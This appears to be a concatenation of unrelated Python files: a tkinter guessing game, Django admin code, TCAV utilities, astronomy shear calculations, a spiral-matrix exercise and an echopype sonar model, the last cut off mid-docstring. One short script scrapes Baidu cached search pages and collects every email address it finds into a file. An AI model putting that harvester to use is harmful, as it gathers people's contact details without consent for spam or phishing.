secretNumber = randrange(10)
print(secretNumber)
lblNoGuess["text"] = "Number of Guesses: 0"
guess_row = 4
# remove all logs on init
for lblLog in lblLogs:
lblLog.grid_forget()
lblLogs = []
def process(i):
global totalNumberOfGuesses, buttons, guess_row
guess = i
totalNumberOfGuesses += 1
lblNoGuess["text"] = "Number of Guesses: " + str(totalNumberOfGuesses)
# check if guess match secret number
if guess == secretNumber:
lbl = t.Label(tk, text="Your guess was right. You won! :) ", fg="green")
lbl.grid(row=guess_row, column=0, columnspan=5)
lblLogs.append(lbl)
guess_row += 1
for b in buttons:
b["state"] = t.DISABLED
else:
# give player some hints
if guess > secretNumber:
lbl = t.Label(tk, text="Secret number is less than your current guess :)", fg="red")
lbl.grid(row=guess_row, column=0, columnspan=5)
lblLogs.append(lbl)
guess_row += 1
else:
lbl = t.Label(tk, text="Secret number is greater than your current guess :)", fg="red")
lbl.grid(row=guess_row, column=0, columnspan=5)
lblLogs.append(lbl)
guess_row += 1
# game is over when max no of guesses is reached
if totalNumberOfGuesses == 3:
if guess != secretNumber:
lbl = t.Label(tk, text="Max guesses reached. You lost! :)", fg="red")
lbl.grid(row=guess_row, column=0, columnspan=5)
lblLogs.append(lbl)
guess_row += 1
for b in buttons:
b["state"] = t.DISABLED
buttons[i]["state"] = t.DISABLED
status = "none"
def startgame(i):
global status
for b in buttons:
b["state"] = t.NORMAL
if status == "none":
status = "started"
btnStartGameList[i]["text"] = "Restart Game"
else:
status = "restarted"
init()
print("Game started")
tk.mainloop()
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth import get_user_model
from django.contrib.auth.admin import UserAdmin
from .forms import UserChangeForm
from .forms import UserCreationForm
from .models import IllumiDeskUser
User = get_user_model()
@admin.register(IllumiDeskUser)
class IllumiDeskUserAdmin(UserAdmin):
form = UserChangeForm
add_form = UserCreationForm
fieldsets = UserAdmin.fieldsets + (
('Custom Fields', {
'fields': ('customer', 'subscription')
}),
)
list_display = ['customer', 'subscription', 'is_superuser',]
search_fields = ['customer']
|
"""
Copyright 2018 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from scipy.stats import ttest_ind
import numpy as np
import tensorflow as tf
from tcav.tcav_results.results_pb2 import Result, Results
_KEYS = [
"cav_key", "cav_concept", "negative_concept", "target_class", "i_up",
"val_directional_dirs_abs_mean", "val_directional_dirs_mean",
"val_directional_dirs_std", "note", "alpha", "bottleneck"
]
def create_session(timeout=10000, interactive=True):
"""Create a tf session for the model.
# This function is slight motification of code written by Alex Mordvintsev
Args:
timeout: tfutil param.
Returns:
TF session.
"""
graph = tf.Graph()
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True
config.operation_timeout_in_ms = int(timeout*1000)
if interactive:
return tf.compat.v1.InteractiveSession(graph=graph, config=config)
else:
return tf.compat.v1.Session(graph=graph, config=config)
def flatten(nested_list):
"""Flatten a nested list."""
return [item for a_list in nested_list for item in a_list]
def process_what_to_run_expand(pairs_to_test,
random_counterpart=None,
num_random_exp=100,
random_concepts=None):
"""Get concept vs. random or random vs. random pairs to run.
Given set of target, list of concept pairs, expand them to include
random pairs. For instance [(t1, [c1, c2])...] becomes
[(t1, [c1, random1],
(t1, [c1, random2],...
(t1, [c2, random1],
(t1, [c2, random2],...]
Args:
pairs_to_test: [(target1, concept1), (target1, concept2), ...,
(target2, concept1), (target2, concept2), ...]
random_counterpart: random concept that will be compared to the concept.
num_random_exp: number of random experiments to run against each concept.
random_concepts: A list of names of random concepts for the random
experiments to draw from. Optional, if not provided, the
names will be random500_{i} for i in num_random_exp.
Returns:
all_concepts: unique set of targets/concepts
new_pairs_to_test: expanded
"""
def get_random_concept(i):
return (random_concepts[i] if random_concepts
else 'random500_{}'.format(i))
new_pairs_to_test = []
for (target, concept_set) in pairs_to_test:
new_pairs_to_test_t = []
# if only one element was given, this is to test with random.
if len(concept_set) == 1:
i = 0
while len(new_pairs_to_test_t) < min(100, num_random_exp):
# make sure that we are not comparing the same thing to each other.
if concept_set[0] != get_random_concept(
i) and random_counterpart != get_random_concept(i):
new_pairs_to_test_t.append(
(target, [concept_set[0], get_random_concept(i)]))
i += 1
elif len(concept_set) > 1:
new_pairs_to_test_t.append((target, concept_set))
else:
tf.compat.v1.logging.info('PAIR NOT PROCCESSED')
new_pairs_to_test.extend(new_pairs_to_test_t)
all_concepts = list(set(flatten([cs + [tc] for tc, cs in new_pairs_to_test])))
return all_concepts, new_pairs_to_test
def process_what_to_run_concepts(pairs_to_test):
"""Process concepts and pairs to test.
Args:
pairs_to_test: a list of concepts to be tested and a target (e.g,
[ ("target1", ["concept1", "concept2", "concept3"]),...])
Returns:
return pairs to test:
target1, concept1
target1, concept2
...
target2, concept1
target2, concept2
...
"""
pairs_for_sstesting = []
# prepare pairs for concpet vs random.
for pair in pairs_to_test:
for concept in pair[1]:
pairs_for_sstesting.append([pair[0], [concept]])
return pairs_for_sstesting
def process_what_to_run_randoms(pairs_to_test, random_counterpart):
"""Process concepts and pairs to test.
Args:
pairs_to_test: a list of concepts to be tested and a target (e.g,
[ ("target1", ["concept1", "concept2", "concept3"]),...])
random_counterpart: a random concept that will be compared to the concept.
Returns:
return pairs to test:
target1, random_counterpart,
target2, random_counterpart,
...
"""
# prepare pairs for random vs random.
pairs_for_sstesting_random = []
targets = list(set([pair[0] for pair in pairs_to_test]))
for target in targets:
pairs_for_sstesting_random.append([target, [random_counterpart]])
return pairs_for_sstesting_random
# helper functions to write summary files
def print_results(results, random_counterpart=None, random_concepts=None, num_random_exp=100,
min_p_val=0.05):
"""Helper function to organize results.
If you ran TCAV with a random_counterpart, supply it here, otherwise supply random_concepts.
If you get unexpected output, make sure you are using the correct keywords.
Args:
results: dictionary of results from TCAV runs.
random_counterpart: name of the random_counterpart used, if it was used.
random_concepts: list of random experiments that were run.
num_random_exp: number of random experiments that were run.
min_p_val: minimum p value for statistical significance
"""
# helper function, returns if this is a random concept
def is_random_concept(concept):
if random_counterpart:
return random_counterpart == concept
elif random_concepts:
return concept in random_concepts
else:
return 'random500_' in concept
# print class, it will be the same for all
print("Class =", results[0]['target_class'])
# prepare data
# dict with keys of concepts containing dict with bottlenecks
result_summary = {}
# random
random_i_ups = {}
for result in results:
if result['cav_concept'] not in result_summary:
result_summary[result['cav_concept']] = {}
if result['bottleneck'] not in result_summary[result['cav_concept']]:
result_summary[result['cav_concept']][result['bottleneck']] = []
result_summary[result['cav_concept']][result['bottleneck']].append(result)
# store random
if is_random_concept(result['cav_concept']):
if result['bottleneck'] not in random_i_ups:
random_i_ups[result['bottleneck']] = []
random_i_ups[result['bottleneck']].append(result['i_up'])
# print concepts and classes with indentation
for concept in result_summary:
# if not random
if not is_random_concept(concept):
print(" ", "Concept =", concept)
for bottleneck in result_summary[concept]:
i_ups = [item['i_up'] for item in result_summary[concept][bottleneck]]
# Calculate statistical significance
_, p_val = ttest_ind(random_i_ups[bottleneck], i_ups)
print(3 * " ", "Bottleneck =", ("%s. TCAV Score = %.2f (+- %.2f), "
"random was %.2f (+- %.2f). p-val = %.3f (%s)") % (
bottleneck, np.mean(i_ups), np.std(i_ups),
np.mean(random_i_ups[bottleneck]),
np.std(random_i_ups[bottleneck]), p_val,
"undefined" if np.isnan(p_val) else "not significant" if p_val > min_p_val else "significant"))
def make_dir_if_not_exists(directory):
if not tf.io.gfile.exists(directory):
tf.io.gfile.makedirs(directory)
def result_to_proto(result):
"""Given a result dict, convert it to a tcav.Result proto.
Args:
result: a dictionary returned by tcav._run_single_set()
Returns:
TCAV.Result proto
"""
result_proto = Result()
for key in _KEYS:
setattr(result_proto, key, result[key])
positive_set_name = result["cav_concept"]
negative_set_name = result["negative_concept"]
for val in result["val_directional_dirs"]:
result_proto.val_directional_dirs.append(val)
result_proto.cav_accuracies.positive_set_accuracy = result["cav_accuracies"][
positive_set_name]
result_proto.cav_accuracies.negative_set_accuracy = result["cav_accuracies"][
negative_set_name]
result_proto.cav_accuracies.overall_accuracy = result["cav_accuracies"][
"overall"]
return result_proto
def results_to_proto(results):
"""Given a list of result dicts, convert it to a tcav.Results proto.
Args:
results: a list of dictionaries returned by tcav.run()
Returns:
TCAV.Results proto
"""
results_proto = Results()
for result in results:
results_proto.results.append(result_to_proto(result))
return results_proto
|
import requests
import re
import numpy as np
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'
}
url = 'https://www.baidu.com/s?wd=%E7%95%99%E4%B8%8B%E9%82%AE%E7%AE%B1'
response = requests.get(url,headers=headers)
html = response.text
regex = re.compile("[a-zA-z]+://[^\s]*")
res = regex.findall(html)
new_res = []
for i in res:
if '//cache.baiducontent.com/c?m=9' in i:
new_res.append(i)
for j in new_res:
response = requests.get(j,headers=headers)
html_1 = response.text
regex = re.compile("[\w!#$%&'*+/=?^_`{|}~-]+(?:\.[\w!#$%&'*+/=?^_`{|}~-]+)*@(?:[\w](?:[\w-]*[\w])?\.)+[\w](?:[\w-]*[\w])?")
res_1 = regex.findall(html_1)
list_2 = str(list(set(res_1)))
with open('C:\\Users\\lenovo\\Desktop\\html\\emile.txt',mode='a',encoding='utf8') as f:
f.write(list_2)
|
import numpy as np
def shear_matrix(night, expid, mjd, data):
"""
Computes the second moment matrix
"""
profiles = data['GUIDE']
shear_data = dict()
for camera in profiles:
Q = np.zeros((2, 2))
profile = profiles[camera]['model']
center = profile.shape[0] / 2
y, x = np.indices((profile.shape))
rx = (x - center) ** 2
ry = (y - center) ** 2
rxy = (x - center) * (y - center)
denom = np.sum(profile)
Q[0, 0] = np.sum(rx.ravel() * profile.ravel()) / denom
Q[1, 1] = np.sum(ry.ravel() * profile.ravel()) / denom
Q[0, 1] = np.sum(rxy.ravel() * profile.ravel()) / denom
Q[1, 0] = Q[0, 1]
a2, b2 = compute_a2b2(Q)
beta = compute_beta(Q, a2, b2)
s, e1, e2 = get_se1e2(Q)
a, b = np.sqrt(a2), np.sqrt(b2)
g = (a - b) / (a + b)
g1, g2 = compute_reduced(g, beta)
shear_data[camera] = {
"night": night, "expid": expid, "mjd": mjd,
"Q": Q, "a": a, "b": b, "beta": beta,
"s": s, "e1": e1, "e2": e2, "g1": g1, "g2": g2
}
return shear_data
def get_se1e2(Q):
"""
Given the second moment matrix, compute s, e1, and e2
"""
Q11 = Q[0, 0]
Q22 = Q[1, 1]
Q12 = Q[0, 1]
e1 = (Q11 - Q22) / (Q11 + Q22 + 2 * np.sqrt(Q11 * Q22 - Q12 ** 2))
e2 = 2 * Q12 / (Q11 + Q22 + 2 * np.sqrt(Q11 * Q22 - Q12 ** 2))
s = np.linalg.det(Q) ** (1/4)
return s, e1, e2
def compute_a2b2(Q):
"""
Given the second moment matrix, compute a^2 and b^2
"""
Q11 = Q[0, 0]
Q22 = Q[1, 1]
Q12 = Q[0, 1]
a2t = 0.5 * (Q11 + Q22 + np.sqrt((Q11 - Q22) ** 2 + 4 * Q12 ** 2))
b2t = 0.5 * (Q11 + Q22 - np.sqrt((Q11 - Q22) ** 2 + 4 * Q12 ** 2))
a2, b2 = max(a2t, b2t), min(a2t, b2t)
assert a2 >= b2
return a2, b2
def compute_beta(Q, a2, b2):
"""
Given the second moment matrix, a^2, and b^2
compute the angle between the axis with length a
and e_1
"""
Q12 = Q[0, 1]
beta = 0.5 * np.arcsin(2 * Q12 / (a2 - b2))
return beta
def compute_reduced(g, beta):
"""
Compute reduced shear components
"""
g1 = g * np.cos(2. * beta)
g2 = g * np.sin(2. * beta)
return g1, g2
|
class Solution:
def spiral(self, matrix, direction):
if not matrix or not matrix[0]:
return []
direction += 1
if direction % 4 == 0: # right
return matrix[0] + self.spiral(matrix[1:], direction)
elif direction % 4 == 1: # down
new = [i[-1] for i in matrix]
matrix = [i[:len(i)-1] for i in matrix]
return new + self.spiral(matrix, direction)
elif direction % 4 == 2: # left
return matrix[-1][::-1] + self.spiral(matrix[:len(matrix)-1], direction)
elif direction % 4 == 3: # up
new = [i[0] for i in matrix][::-1]
matrix = [i[1:] for i in matrix]
return new + self.spiral(matrix, direction)
# @param matrix, a list of lists of integers
# @return a list of integer
def spiralOrder(self, matrix):
tmp = self.spiral(matrix, -1)
return tmp
s = Solution()
m = [[7],[9],[6]]
m = []
m = [
[ 1, 2, 3 ],
[ 4, 5, 6 ],
[ 7, 8, 9 ]
]
m = [
[1,2,3,4],
[5,6,7,8],
[9,10,11,12],
[13,14,15,16]
]
print s.spiralOrder(m)
|
"""
echopype data model that keeps tracks of echo data and
its connection to data files.
"""
import os
import warnings
import datetime as dt
from echopype.utils import uwa
import numpy as np
import xarray as xr
class ModelBase(object):
"""Class for manipulating echo data that is already converted to netCDF."""
def __init__(self, file_path=""):
self.file_path = file_path # this passes the input through file name test
self.noise_est_range_bin_size = 5 # meters per tile for noise estimation
self.noise_est_ping_size = 30 # number of pings per tile for noise estimation
self.MVBS_range_bin_size = 5 # meters per tile for MVBS
self.MVBS_ping_size = 30 # number of pings per tile for MVBS
self.Sv = None # calibrated volume backscattering strength
self.Sv_path = None # path to save calibrated results
self.Sv_clean = None # denoised volume backscattering strength
self.TS = None # calibrated target strength
self.TS_path = None # path to save TS calculation results
self.MVBS = None # mean volume backscattering strength
self._salinity = None
self._temperature = None
self._pressure = None
self._sound_speed = None
self._sample_thickness = None
self._range = None
self._seawater_absorption = None
@property
def salinity(self):
return self._salinity
@salinity.setter
def salinity(self, sal):
self._salinity = sal
@property
def pressure(self):
return self._pressure
@pressure.setter
def pressure(self, pres):
self._pressure = pres
@property
def temperature(self):
return self._temperature
@temperature.setter
def temperature(self, t):
self._temperature = t
@property
def sample_thickness(self):
return self._sample_thickness
@sample_thickness.setter
def sample_thickness(self, sth):
self._sample_thickness = sth
@property
def range(self):
return self._range
@range.setter
def range(self, rr):
self._range = rr
@property
def seawater_absorption(self):
return self._seawater_absorption
@seawater_absorption.setter
def seawater_absorption(self, absorption):
self._seawater_absorption.values = absorption
@property
def sound_speed(self):
return self._sound_speed
@sound_speed.setter
def sound_speed(self, ss):
if isinstance(self._sound_speed, xr.DataArray):
self._sound_speed.values = ss
else:
self._sound_speed = ss
@property
def file_path(self):
return self._file_path
@file_path.setter
def file_path(self, p):
self._file_path = p
# Load netCDF groups if file format is correct
pp = os.path.basename(p)
_, ext = os.path.splitext(pp)
supported_ext_list = ['.raw', '.01A']
if ext in supported_ext_list:
print('Data file in manufacturer format, please convert to .nc first.')
elif ext == '.nc':
self.toplevel = xr.open_dataset(self.file_path)
# Get .nc filenames for storing processed data if computation is performed
self.Sv_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_Sv.nc')
self.Sv_clean_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_Sv_clean.nc')
self.TS_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_TS.nc')
self.MVBS_path = os.path.join(os.path.dirname(self.file_path),
os.path.splitext(os.path.basename(self.file_path))[0] + '_MVBS.nc')
# Raise error if the file format convention does not match
if self.toplevel.sonar_convention_name != 'SONAR-netCDF4':
raise ValueError('netCDF file convention not recognized.')
self.toplevel.close()
else:
raise ValueError('Data file format not recognized.')
def calc_sound_speed(self, src='file'):
"""Base method to be overridden for calculating sound_speed for different sonar models
"""
# issue warning when subclass methods not available
print("Sound speed calculation has not been implemented for this sonar model!")
def calc_seawater_absorption(self, src='file'):
"""Base method to be overridden for calculating seawater_absorption for different sonar models
"""
# issue warning when subclass methods not available
print("Seawater absorption calculation has not been implemented for this sonar model!")
def calc_sample_thickness(self):
"""Base method to be overridden for calculating sample_thickness for different sonar models.
"""
# issue warning when subclass methods not available
print('Sample thickness calculation has not been implemented for this sonar model!')
def calc_range(self):
"""Base method to be overridden for calculating range for different sonar models.
"""
# issue warning when subclass methods not available
print('Range calculation has not been implemented for this sonar model!')
def recalculate_environment(self, ss=True, sa=True, st=True, r=True):
""" Recalculates sound speed, seawater absorption, sample thickness, and range using
salinity, temperature, and pressure
Parameters
----------
ss : bool
Whether to calcualte sound speed. Defaults to `True`
sa : bool
Whether to calcualte seawater absorption. Defaults to `True`
st : bool
Whether to calcualte sample thickness. Defaults to `True`
r : bool
Whether to calcualte range. Defaults to `True`
"""
s, t, p = self.salinity, self.temperature, self.pressure
if s is not None and t is not None and p is not None:
if ss:
self.sound_speed = self.calc_sound_speed(src='user')
if sa:
self.seawater_absorption = self.calc_seawater_absorption(src='user')
if st:
self.sample_thickness = self.calc_sample_thickness()
if r:
self.range = self.calc_range()
elif s is None:
print("Salinity was not provided. Environment was not recalculated")
elif t is None:
print("Temperature was not provided. Environment was not recalculated")
else:
print("Pressure was not provided. Environment was not recalculated")
def calibrate(self):
"""Base method to be overridden for volume backscatter calibration and echo-integration for different sonar models.
"""
# issue warning when subclass methods not available
print('Calibration has not been implemented for this sonar model!')
def calibrate_TS(self):
"""Base method to be overridden for target strength calibration and echo-integration for different sonar models.
"""
# issue warning when subclass methods not available
print('Target strength calibration has not been implemented for this sonar model!')
def validate_path(self, save_path, save_postfix):
"""Creates a directory if it doesnt exist. Returns a valid save path.
"""
def _assemble_path():
file_in = os.path.basename(self.file_path)
file_name, file_ext = os.path.splitext(file_in)
return file_name + save_postfix + file_ext
if save_path is None:
save_dir = os.path.dirname(self.file_path)
file_out = _assemble_path()
else:
path_ext = os.path.splitext(save_path)[1]
# If given save_path is file, split into directory and file
if path_ext != '':
save_dir, file_out = os.path.split(save_path)
if save_dir == '': # save_path is only a filename without directory
save_dir = os.path.dirname(self.file_path) # use directory from input file
# If given save_path is a directory, get a filename from input .nc file
else:
save_dir = save_path
file_out = _assemble_path()
# Create folder if not already exists
if save_dir == '':
# TODO: should we use '.' instead of os.getcwd()?
save_dir = os.getcwd() # explicit about path to current directory
if not os.path.exists(save_dir):
os.mkdir(save_dir)
return os.path.join(save_dir, file_out)
@staticmethod
def get_tile_params(r_data_sz, p_data_sz, r_tile_sz, p_tile_sz, sample_thickness):
"""Obtain ping_time and range_bin parameters associated with groupby and groupby_bins operations.
These parameters are used in methods remove_noise(), noise_estimates(), get_MVBS().
Parameters
----------
r_data_sz : int
number of range_bin entries in data
p_data_sz : int
number of ping_time entries in data
r_tile_sz : float
tile size along the range_bin dimension [m]
p_tile_sz : int
tile size along the ping_time dimension [number of pings]
sample_thickness : float
thickness of each data sample, determined by sound speed and pulse duration
Returns
-------
r_tile_sz : int
modified tile size along the range dimension [m], determined by sample_thickness
r_tile_bin_edge : list of int
bin edges along the range_bin dimension for :py:func:`xarray.DataArray.groupby_bins` operation
p_tile_bin_edge : list of int
bin edges along the ping_time dimension for :py:func:`xarray.DataArray.groupby_bins` operation
"""
# Adjust noise_est_range_bin_size because range_bin_size may be an inconvenient value
num_r_per_tile = np.round(r_tile_sz / sample_thickness).astype(int) # num of range_bin per tile
r_tile_sz = num_r_per_tile * sample_thickness
# Total number of range_bin and ping tiles
num_tile_range_bin = np.ceil(r_data_sz / num_r_per_tile).astype(int)
if np.mod(p_data_sz, p_tile_sz) == 0:
num_tile_ping = np.ceil(p_data_sz / p_tile_sz).astype(int) + 1
else:
num_tile_ping = np.ceil(p_data_sz / p_tile_sz).astype(int)
# Tile bin edges along range
# ... -1 to make sure each bin has the same size because of the right-inclusive and left-exclusive bins
r_tile_bin_edge = [np.arange(x.values + 1) * y.values - 1 for x, y in zip(num_tile_range_bin, num_r_per_tile)]
p_tile_bin_edge = np.arange(num_tile_ping + 1) * p_tile_sz - 1
return r_tile_sz, r_tile_bin_edge, p_tile_bin_edge
def _get_proc_Sv(self, source_path=None, source_postfix='_Sv'):
"""Private method to return calibrated Sv either from memory or _Sv.nc file.
This method is called by remove_noise(), noise_estimates() and get_MVBS().
"""
if self.Sv is None: # calibration not yet performed
Sv_path = self.validate_path(save_path=source_path, # wrangle _Sv path
save_postfix=source_postfix)
if os.path.exists(Sv_path): # _Sv exists
self.Sv = xr.open_dataset(Sv_path) # load _Sv file
else:
# if path specification given but file do not exist:
if (source_path is not None) or (source_postfix != '_Sv'):
print('%s no calibrated data found in specified path: %s' %
(dt.datetime.now().strftime('%H:%M:%S'), Sv_path))
else:
print('%s data has not been calibrated. ' % dt.datetime.now().strftime('%H:%M:%S'))
print(' performing calibration now and operate from Sv in memory.')
self.calibrate() # calibrate, have Sv in memory
return self.Sv
def remove_noise(self, source_postfix='_Sv', source_path=None,
noise_est_range_bin_size=None, noise_est_ping_size=None,
SNR=0, Sv_threshold=None,
save=False, save_postfix='_Sv_clean', save_path=None):
"""Remove noise by using noise estimates obtained from the minimum mean calibrated power level
along each column of tiles.
See method noise_estimates() for details of noise estimation.
Reference: De Robertis & Higginbottom, 2017, ICES Journal of Marine Sciences
Parameters
----------
source_postfix : str
postfix of the Sv file used to remove noise from, default to '_Sv'
source_path : str
path of Sv file used to remove noise from, can be one of the following:
- None (default):
use Sv in RAWFILENAME_Sv.nc in the same folder as the raw data file,
or when RAWFILENAME_Sv.nc doesn't exist, perform self.calibrate() and use the resulted self.Sv
- path to a directory: RAWFILENAME_Sv.nc in the specified directory
- path to a specific file: the specified file, e.g., ./another_directory/some_other_filename.nc
noise_est_range_bin_size : float, optional
Meters per tile for noise estimation [m]
noise_est_ping_size : int, optional
Number of pings per tile for noise estimation
SNR : int, optional
Minimum signal-to-noise ratio (remove values below this after general noise removal).
Sv_threshold : int, optional
Minimum Sv threshold [dB] (remove values below this after general noise removal)
save : bool, optional
Whether to save the denoised Sv (``Sv_clean``) into a new .nc file.
Default to ``False``.
save_postfix : str
Filename postfix, default to '_Sv_clean'
save_path : str
Full filename to save to, overwriting the RAWFILENAME_Sv_clean.nc default
"""
# Check params
if (noise_est_range_bin_size is not None) and (self.noise_est_range_bin_size != noise_est_range_bin_size):
self.noise_est_range_bin_size = noise_est_range_bin_size
if (noise_est_ping_size is not None) and (self.noise_est_ping_size != noise_est_ping_size):
self.noise_est_ping_size = noise_est_ping_size
# Get calibrated Sv
if self.Sv is not None:
print('%s Remove noise from Sv stored in memory.' % dt.datetime.now().strftime('%H:%M:%S'))
print_src = False
else:
print_src = True
proc_data = self._get_proc_Sv(source_path=source_path, source_postfix=source_postfix)
if print_src:
print('%s Remove noise from Sv stored in: %s' %
(dt.datetime.now().strftime('%H:%M:%S'), self.Sv_path))
# Get tile indexing parameters
self.noise_est_range_bin_size, range_bin_tile_bin_edge, ping_tile_bin_edge = \
self.get_tile_params(r_data_sz=proc_data.range_bin.size,
p_data_sz=proc_data.ping_time.size,
r_tile_sz=self.noise_est_range_bin_size,
p_tile_sz=self.noise_est_ping_size,
sample_thickness=self.sample_thickness)
# Get TVG and ABS for compensating for transmission loss
range_meter = self.range
TVG = np.real(20 * np.log10(range_meter.where(range_meter >= 1, other=1)))
ABS = 2 * self.seawater_absorption * range_meter
# Function for use with apply
def remove_n(x, rr):
p_c_lin = 10 ** ((x.Sv - x.ABS - x.TVG) / 10)
nn = 10 * np.log10(p_c_lin.mean(dim='ping_time').groupby_bins('range_bin', rr).mean().min(
dim='range_bin_bins')) + x.ABS + x.TVG
# Return values where signal is [SNR] dB above noise and at least [Sv_threshold] dB
if not Sv_threshold:
return x.Sv.where(x.Sv > (nn + SNR), other=np.nan)
else:
return x.Sv.where((x.Sv > (nn + SNR)) & (x > Sv_threshold), other=np.nan)
# Groupby noise removal operation
proc_data.coords['ping_idx'] = ('ping_time', np.arange(proc_data.Sv['ping_time'].size))
ABS.name = 'ABS'
TVG.name = 'TVG'
pp = xr.merge([proc_data, ABS])
pp = xr.merge([pp, TVG])
# check if number of range_bin per tile the same for all freq channels
if np.unique([np.array(x).size for x in range_bin_tile_bin_edge]).size == 1:
Sv_clean = pp.groupby_bins('ping_idx', ping_tile_bin_edge).\
map(remove_n, rr=range_bin_tile_bin_edge[0])
Sv_clean = Sv_clean.drop_vars(['ping_idx'])
else:
tmp_clean = []
cnt = 0
for key, val in pp.groupby('frequency'): # iterate over different frequency channel
tmp = val.groupby_bins('ping_idx', ping_tile_bin_edge). \
map(remove_n, rr=range_bin_tile_bin_edge[cnt])
cnt += 1
tmp_clean.append(tmp)
clean_val = np.array([zz.values for zz in xr.align(*tmp_clean, join='outer')])
Sv_clean = xr.DataArray(clean_val,
coords={'frequency': proc_data['frequency'].values,
'ping_time': tmp_clean[0]['ping_time'].values,
'range_bin': tmp_clean[0]['range_bin'].values},
dims=['frequency', 'ping_time', 'range_bin'])
# Set up DataSet
Sv_clean.name = 'Sv'
Sv_clean = Sv_clean.to_dataset()
Sv_clean['noise_est_range_bin_size'] = ('frequency', self.noise_est_range_bin_size)
Sv_clean.attrs['noise_est_ping_size'] = self.noise_est_ping_size
# Attach calculated range into data set
Sv_clean['range'] = (('frequency', 'range_bin'), self.range.T)
# Save as object attributes as a netCDF file
self.Sv_clean = Sv_clean
# TODO: now adding the below so that MVBS can be calculated directly
# from the cleaned Sv without saving and loading Sv_clean from disk.
# However this is not explicit to the user. A better way to do this
# is to change get_MVBS() to first check existence of self.Sv_clean
# when `_Sv_clean` is specified as the source_postfix.
if not print_src: # remove noise from Sv stored in memory
self.Sv = Sv_clean.copy()
if save:
self.Sv_clean_path = self.validate_path(save_path=save_path, save_postfix=save_postfix)
print('%s saving denoised Sv to %s' % (dt.datetime.now().strftime('%H:%M:%S'), self.Sv_clean_path))
Sv_clean.to_netcdf(self.Sv_clean_path)
# Close opened resources
proc_data.close()
def noise_estimates(self, source_postfix='_Sv', source_path=None,
noise_est_range_bin_size=None, noise_est_ping_size=None):
"""Obtain noise estimates from the minimum mean calibrated power level along each column of tiles.
The tiles here are defined by class attributes noise_est_range_bin_size and noise_est_ping_size.
This method contains redundant pieces of code that also appear in method remove_noise(),
but this method can be used separately to determine the exact tile size for noise removal before
noise removal is actually performed.
Parameters
----------
source_postfix : str
postfix of the Sv file used to calculate noise estimates from, default to '_Sv'
source_path : str
path of Sv file used to calculate noise estimates from, can be one of the following:
- None (default):
use Sv in RAWFILENAME_Sv.nc in the same folder as the raw data file,
or when RAWFILENAME_Sv.nc doesn't exist, perform self.calibrate() and use the resulted self.Sv
- path to a directory: RAWFILENAME_Sv.nc in the specified directory
- path to a specific file: the specified file, e.g., ./another_directory/some_other_filename.nc
noise_est_range_bin_size : float
meters per tile for noise estimation [m]
noise_est_ping_size : int
number of pings per tile for noise estimation
Returns
-------
noise_est : xarray DataSet
noise estimates as a DataArray with dimension [ping_time x range_bin]
ping_time and range_bin are taken from the first element of each tile along each of the dimensions
"""
# Check params
if (noise_est_range_bin_size is not None) and (self.noise_est_range_bin_size != noise_est_range_bin_size):
self.noise_est_range_bin_size = noise_est_range_bin_size
if (noise_est_ping_size is not None) and (self.noise_est_ping_size != noise_est_ping_size):
self.noise_est_ping_size = noise_est_ping_size
# Use calibrated data to calculate noise removal
proc_data = self._get_proc_Sv()
# Get tile indexing parameters
self.noise_est_range_bin_size, range_bin_tile_bin_edge, ping_tile_bin_edge = \
self.get_tile_params(r_data_sz=proc_data.range_bin.size,
p_data_sz=proc_data.ping_time.size,
r_tile_sz=self.noise_est_range_bin_size,
p_tile_sz=self.noise_est_ping_size,
sample_thickness=self.sample_thickness)
# Values for noise estimates
range_meter = self.range
TVG = np.real(20 * np.log10(range_meter.where(range_meter >= 1, other=1)))
ABS = 2 * self.seawater_absorption * range_meter
# Noise estimates
proc_data['power_cal'] = 10 ** ((proc_data.Sv - ABS - TVG) / 10)
# check if number of range_bin per tile the same for all freq channels
if np.unique([np.array(x).size for x in range_bin_tile_bin_edge]).size == 1:
noise_est = 10 * np.log10(proc_data['power_cal'].coarsen(
ping_time=self.noise_est_ping_size,
range_bin=int(np.unique(self.noise_est_range_bin_size / self.sample_thickness)),
boundary='pad').mean().min(dim='range_bin'))
else:
range_bin_coarsen_idx = (self.noise_est_range_bin_size / self.sample_thickness).astype(int)
tmp_noise = []
for r_bin in range_bin_coarsen_idx:
freq = r_bin.frequency.values
tmp_da = 10 * np.log10(proc_data['power_cal'].sel(frequency=freq).coarsen(
ping_time=self.noise_est_ping_size,
range_bin=r_bin.values,
boundary='pad').mean().min(dim='range_bin'))
tmp_da.name = 'noise_est'
tmp_noise.append(tmp_da)
# Construct a dataArray TODO: this can probably be done smarter using xarray native functions
noise_val = np.array([zz.values for zz in xr.align(*tmp_noise, join='outer')])
noise_est = xr.DataArray(noise_val,
coords={'frequency': proc_data['frequency'].values,
'ping_time': tmp_noise[0]['ping_time'].values},
dims=['frequency', 'ping_time'])
noise_est = noise_est.to_dataset(name='noise_est')
noise_est['noise_est_range_bin_size'] = ('frequency', self.noise_est_range_bin_size)
noise_est.attrs['noise_est_ping_size'] = self.noise_est_ping_size
# Close opened resources
proc_data.close()
return noise_est
def get_MVBS(self, source_postfix='_Sv', source_path=None,
MVBS_range_bin_size=None, MVBS_ping_size=None,
save=False, save_postfix='_MVBS', save_path=None):
"""Calculate Mean Volume Backscattering Strength (MVBS).
The calculation uses class attributes MVBS_ping_size and MVBS_range_bin_size to
calculate and save MVBS as a new attribute to the calling EchoData instance.
MVBS is an xarray DataArray with dimensions ``ping_time`` and ``range_bin``
that are from the first elements of each tile along the corresponding dimensions
in the original Sv or Sv_clean DataArray.
Parameters
----------
source_postfix : str
postfix of the Sv file used to calculate MVBS, default to '_Sv'
source_path : str
path of Sv file used to calculate MVBS, can be one of the following:
- None (default):
